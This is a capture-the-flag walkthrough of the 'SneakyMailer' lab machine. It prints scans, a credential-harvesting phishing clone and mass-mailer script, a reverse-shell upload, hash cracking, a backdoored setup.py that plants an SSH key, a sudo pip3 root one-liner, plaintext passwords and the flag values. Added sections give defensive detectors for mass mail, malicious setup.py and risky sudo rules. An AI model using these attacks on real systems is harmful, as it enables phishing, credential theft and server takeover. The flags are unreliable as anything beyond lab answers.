Service overview

$ nmapAutomator.sh -H 10.10.10.197 -t Full
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: STARTTLS THREAD=ORDEREDSUBJECT ENABLE UTF8=ACCEPTA0001 ACL2=UNION ACL IMAP4rev1 THREAD=REFERENCES NAMESPACE QUOTA UIDPLUS IDLE CHILDREN SORT CAPABILITY OK completed
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:[email protected]
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: THREAD=ORDEREDSUBJECT ENABLE UTF8=ACCEPTA0001 AUTH=PLAIN ACL2=UNION ACL IMAP4rev1 THREAD=REFERENCES NAMESPACE QUOTA UIDPLUS IDLE CHILDREN SORT CAPABILITY OK completed
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:[email protected]
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
$ feroxbuster -u http://sneakycorp.htb/ -w /usr/share/dirb/wordlists/common.txt -x php,py,sh,txt,pdf

http://sneakycorp.htb/pypi/
$ feroxbuster -u http://sneakycorp.htb/pypi/ -w /usr/share/dirb/wordlists/common.txt -x php,py,sh,txt,pdf

200       81l      197w        0c http://sneakycorp.htb/pypi/register.php

Harvesting e-mail addresses

Grab all the e-mail addresses from team.php:

curl http://sneakycorp.htb/team.php | grep '@' | awk '{gsub(/<[^>]*>/,"");print;}' | tr -d ' ' > emails.txt

Phishing

Save the HTML page http://sneakycorp.htb/pypi/register.php:

mkdir templates
curl http://sneakycorp.htb/pypi/register.php -o templates/register.php
sed -i 's/\/vendor/http:\/\/sneakycorp.htb\/vendor/g' templates/register.php
sed -i 's/\/css\//http:\/\/sneakycorp.htb\/css\//g' templates/register.php

app.py:

from flask import Flask, request, render_template, redirect
import requests

app = Flask(__name__)

@app.route('/pypi/register.php', methods=['GET', 'POST'])
def register():
    if request.method == 'GET':
        # Serve the saved copy of the registration page
        return render_template('register.php')
    # Log the submitted form, forward it to the real site, then send the user on
    print(request.args)
    print(request.form)
    requests.post('http://sneakycorp.htb/pypi/register.php', data=request.form)
    return redirect('http://sneakycorp.htb', code=302)


app.run('0.0.0.0', 80)

Run app.py:

python3 app.py

mailer.sh:

#!/bin/bash
# One message per address in emails.txt, pointing at the cloned registration page
while read -r email; do
  echo "[+] Sending email to $email"
  swaks --from [email protected] --to "$email" --header 'Subject: Register in the portal' --body 'http://10.10.14.6/pypi/register.php' --server sneakycorp.htb >/dev/null
done < emails.txt

Run mailer.sh:

chmod +x mailer.sh
./mailer.sh

Wait:

ImmutableMultiDict([('firstName', 'Paul'), ('lastName', 'Byrd'), ('email', '[email protected]'), ('password', '^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht'), ('rpassword', '^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht')])
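What the mail server sees during this step, from the defender's side: the loop above produces one inbound message per staff address from a single external sender inside a minute, which is a pattern a mail log can flag. The following is an added example, not code from the writeup: it parses constructed Postfix log lines, joins the envelope sender (logged by qmgr) with each recipient (logged by the delivery agent) through the queue ID, and reports any sender that reaches many distinct recipients inside a sliding time window. The log lines, hostnames, addresses and thresholds are all this example's own assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Syslog-style Postfix lines: qmgr logs the envelope sender per queue ID, and the
# delivery agent (local/virtual/smtp/lmtp) logs each recipient under that same ID.
TS = r'(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d)'
QMGR_RE = re.compile(TS + r' \S+ postfix/qmgr\[\d+\]: (?P<qid>[0-9A-F]+): from=<(?P<sender>[^>]*)>')
DELIVERY_RE = re.compile(TS + r' \S+ postfix/(?:local|virtual|smtp|lmtp)\[\d+\]: (?P<qid>[0-9A-F]+): to=<(?P<rcpt>[^>]*)>')


def _parse_ts(text):
    # Syslog timestamps carry no year; the default year is fine for differences
    # within one day, which is all the sample needs.
    return datetime.strptime(text, '%b %d %H:%M:%S')


def find_mass_mailers(lines, min_recipients=5, window_seconds=600):
    """Return {sender: sorted recipients} for every envelope sender that reached
    at least min_recipients distinct addresses inside some window_seconds span."""
    sender_of = {}                  # queue id -> envelope sender
    deliveries = defaultdict(list)  # sender -> [(timestamp, recipient)]
    for line in lines:
        m = QMGR_RE.match(line)
        if m:
            sender_of[m['qid']] = m['sender'] or '<>'  # empty sender = bounce
            continue
        m = DELIVERY_RE.match(line)
        if m and m['qid'] in sender_of:
            deliveries[sender_of[m['qid']]].append((_parse_ts(m['ts']), m['rcpt']))

    flagged = {}
    for sender, events in deliveries.items():
        events.sort()
        in_window = Counter()       # recipient -> deliveries currently inside the window
        left = 0
        for t, rcpt in events:
            in_window[rcpt] += 1
            # Drop deliveries that fell out of the window ending at t
            while (t - events[left][0]).total_seconds() > window_seconds:
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= min_recipients:
                flagged[sender] = sorted({r for _, r in events})
                break
    return flagged


# Constructed sample log: one external sender mails six staff mailboxes, one
# message each, within a minute (the shape the mailer loop produces), plus one
# ordinary internal message. Hostnames and addresses are made up.
STAFF = ['alice', 'bob', 'carol', 'dave', 'erin', 'frank']
SAMPLE_LOG = []
for i, user in enumerate(STAFF):
    qid = f'A1B2C3D4{i:02X}'
    SAMPLE_LOG.append(f'Jul 14 09:00:{i * 10:02d} mail postfix/qmgr[812]: {qid}: '
                      f'from=<mailer@external.example>, size=640, nrcpt=1 (queue active)')
    SAMPLE_LOG.append(f'Jul 14 09:00:{i * 10:02d} mail postfix/local[901]: {qid}: '
                      f'to=<{user}@corp.example>, relay=local, delay=0.1, dsn=2.0.0, status=sent (delivered to maildir)')
SAMPLE_LOG += [
    'Jul 14 09:05:10 mail postfix/qmgr[812]: B0B0B0B0B0: from=<hr@corp.example>, size=2048, nrcpt=1 (queue active)',
    'Jul 14 09:05:11 mail postfix/local[901]: B0B0B0B0B0: to=<alice@corp.example>, relay=local, delay=0.2, dsn=2.0.0, status=sent (delivered to maildir)',
]

if __name__ == '__main__':
    for sender, rcpts in find_mass_mailers(SAMPLE_LOG).items():
        print(f'{sender} -> {len(rcpts)} distinct recipients: {", ".join(rcpts)}')
```

Feed it /var/log/mail.log instead of SAMPLE_LOG and tune the threshold to the site's normal fan-out; a sender that is external, new to the server and hits most of the directory in one burst is the case worth paging on, regardless of the exact numbers.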

Mailbox

Log in with Evolution. Go to the Sent folder:

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

FTP

Log in to FTP with the credentials found and upload shell.php.

Brute-force subdomains with ffuf:

$ ffuf -u http://sneakycorp.htb -H 'Host: FUZZ.sneakycorp.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 6

=> dev.sneakycorp.htb

Reverse Shell

nc -lnvp 1234
curl http://dev.sneakycorp.htb/shell.php

LinEnum

=> .htpasswd =>pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Brute force

$ hashid
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
MD5 / APACHE md5 
$ echo 'pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/' > htpasswd
$ hashcat -m 1600 htpasswd /usr/share/wordlists/rockyou.txt --username
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

Web

$ ls /var/www/
dev.sneakycorp.htb  html  pypi.sneakycorp.htb  sneakycorp.htb

=> http://pypi.sneakycorp.htb:8080/

Log in to the PyPI server http://pypi.sneakycorp.htb:8080/simple/ with:
pypi:soufianeelhaoui

Local package for pip

$ wget https://files.pythonhosted.org/packages/85/73/daa5c91ce58cd5db7aebaca05fe8f7ca4223bfd32525dbec93662fb449b3/python-package-example-0.1.tar.gz
$ tar xvf python-package-example-0.1.tar.gz
$ nano setup.py
from setuptools import setup, find_packages

try:
  with open("/home/low/.ssh/authorized_keys", "w") as f:
    f.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCtRShyvgwXRSQCdJxVHSOmsvH1gbQMXAuUYSs0abix0cynMoPGfWCO9GE9nF6gSvcrvc>

except:
  setup(
    name='python-package-example',
    version='0.1',
    packages=find_packages(exclude=['tests*']),
    license='MIT',
    description='An example python package',
    long_description=open('README.txt').read(),
    install_requires=['numpy'],
    url='https://github.com/BillMills/python-package-example',
    author='Bill Mills',
    author_email='[email protected]'
  )
$ nano ~/.pypirc
[distutils]
index-servers =
    remote

[remote]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
$ python3 setup.py sdist upload -r remote
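The upload works because pip runs a package's setup.py with the installer's privileges before anything is installed, so whoever can publish to the index can run code on every host that installs from it. As an added example (not code from the writeup, and not a real tool), here is a minimal static check that a private index or a CI gate could run over an sdist's setup.py using the standard-library ast module: it flags shell/exec calls, install-time writes to sensitive paths, and a setup() call that is only reachable through an exception handler, which is exactly the shape of the package above. The two sample setup.py sources are constructed, with a placeholder in place of a key.

```python
import ast

# Calls that give install-time code an execution or network primitive
# (this list is the example's own assumption, not exhaustive).
DANGEROUS_CALLS = {
    'os.system', 'os.popen', 'os.execl', 'os.execv', 'os.execve', 'os.execvp',
    'subprocess.run', 'subprocess.call', 'subprocess.Popen', 'subprocess.check_output',
    'eval', 'exec', 'urllib.request.urlopen', 'socket.socket',
}
# Path fragments that usually mean persistence rather than packaging
SENSITIVE_PATH_MARKERS = ('.ssh', 'authorized_keys', '/etc/', 'cron', '.bashrc', '.profile')


def _dotted_name(node):
    """'os.execl' for Attribute/Name chains, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return '.'.join(reversed(parts))
    return None


def _constant(node, default=None):
    return node.value if isinstance(node, ast.Constant) else default


def scan_setup_py(source):
    """Return sorted [(lineno, message)] for suspicious install-time behaviour."""
    tree = ast.parse(source)
    parents = {child: parent for parent in ast.walk(tree)
               for child in ast.iter_child_nodes(parent)}
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name in DANGEROUS_CALLS:
            findings.append((node.lineno, f'install-time call to {name}'))
        elif name == 'open':
            # open(path, mode) with a write mode is a file write at install time
            mode = _constant(node.args[1]) if len(node.args) > 1 else None
            for kw in node.keywords:
                if kw.arg == 'mode':
                    mode = _constant(kw.value)
            path = str(_constant(node.args[0], '')) if node.args else ''
            if isinstance(mode, str) and any(c in mode for c in 'wa+'):
                if any(marker in path for marker in SENSITIVE_PATH_MARKERS):
                    findings.append((node.lineno, f'install-time write to sensitive path {path!r}'))
                else:
                    findings.append((node.lineno, f'install-time write to {path!r}'))
        elif name == 'setup':
            # setup() nested under an except: clause means the package metadata
            # is only a fallback and the real work happens before it.
            ancestor = parents.get(node)
            while ancestor is not None:
                if isinstance(ancestor, ast.ExceptHandler):
                    findings.append((node.lineno, 'setup() only reached via exception handler'))
                    break
                ancestor = parents.get(ancestor)
    return sorted(findings)


# Constructed samples. The first mirrors the shape of the package above (with a
# placeholder instead of a real key); the second is an ordinary setup.py.
MALICIOUS_SETUP = '''
from setuptools import setup, find_packages

try:
    with open("/home/low/.ssh/authorized_keys", "w") as f:
        f.write("ssh-rsa PLACEHOLDER-PUBLIC-KEY")
except:
    setup(name='python-package-example', version='0.1')
'''

BENIGN_SETUP = '''
from setuptools import setup, find_packages

setup(
    name='python-package-example',
    version='0.1',
    packages=find_packages(exclude=['tests*']),
    long_description=open('README.txt').read(),
)
'''

if __name__ == '__main__':
    for label, src in (('malicious', MALICIOUS_SETUP), ('benign', BENIGN_SETUP)):
        print(label, scan_setup_py(src) or 'clean')
```

The check is heuristic (string-built paths and obfuscated calls slip past it), so treat it as a tripwire, not the control: the control is who may upload to the index, which is why the plaintext credentials in ~/.pypirc and the .htpasswd file readable from the web root matter more than any setup.py scanner.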

User flag

$ ssh [email protected]
low@sneakymailer:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:6f:34 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.197/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:6f34/64 scope global dynamic mngtmpaddr
       valid_lft 86240sec preferred_lft 14240sec
    inet6 fe80::250:56ff:feb9:6f34/64 scope link
       valid_lft forever preferred_lft forever
low@sneakymailer:~$ cat user.txt
cade53a4eec1995f11377ce494320f36

Privilege escalation

We can run /usr/bin/pip3 via sudo without a password:

low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > "$TF/setup.py"
sudo pip3 install "$TF"
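From the defender's side the sudoers rule itself is the finding: pip3 executes the package's setup.py during installation, so sudo rights on it are root rights. As an added example (not from the writeup), a small audit over sudo -l output such as the listing above, flagging rules that grant package installers, interpreters or editors with shell escapes, or ALL. The binary lists, the sample output and the rule regex are this example's own assumptions.

```python
import re
import shlex

# One 'sudo -l' rule line: (runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')

# Binaries that let the caller run code of their own choosing, grouped by why.
# The lists are this example's own assumptions and are not exhaustive.
RISKY = {
    'installs and executes package code': {'pip', 'pip2', 'pip3', 'easy_install', 'npm', 'gem', 'cpan'},
    'interpreter': {'python', 'python2', 'python3', 'perl', 'ruby', 'node', 'php', 'sh', 'bash', 'dash', 'zsh'},
    'editor or pager with shell escape': {'vi', 'vim', 'nano', 'less', 'more', 'man'},
}


def audit_sudo_l(output):
    """Parse 'sudo -l' output and return [(runas, tags, command, reason)] for
    every rule whose command is effectively a shell for the run-as user."""
    findings = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults entries, headers, blank lines
        tags = tuple(t for t in m['tags'].replace(' ', '').split(':') if t)
        for cmd in m['cmds'].split(','):
            cmd = cmd.strip()
            if not cmd or cmd.startswith('!'):
                continue  # negated rules remove rights rather than grant them
            if cmd == 'ALL':
                findings.append((m['runas'], tags, cmd, 'unrestricted'))
                continue
            binary = shlex.split(cmd)[0].rsplit('/', 1)[-1]
            for reason, names in RISKY.items():
                if binary in names:
                    findings.append((m['runas'], tags, cmd, reason))
    return findings


# Constructed sample in the shape of the listing above, plus one harmless rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
    (root) /usr/bin/id
"""

if __name__ == '__main__':
    for runas, tags, cmd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f'[{runas}] {" ".join(tags) or "password"} {cmd}: {reason}')
```

Restricting the arguments (for example allowing only pip3 install of a named package) does not close this, because the installed package's setup.py still runs as root; the fix is to drop the rule and let unprivileged users install into a virtualenv or with --user.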

Root flag

$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:6f:34 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.197/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:6f34/64 scope global dynamic mngtmpaddr
       valid_lft 86029sec preferred_lft 14029sec
    inet6 fe80::250:56ff:feb9:6f34/64 scope link
       valid_lft forever preferred_lft forever
$ cat root.txt
4edf8e29eb56fb88b122e058ebc2f02d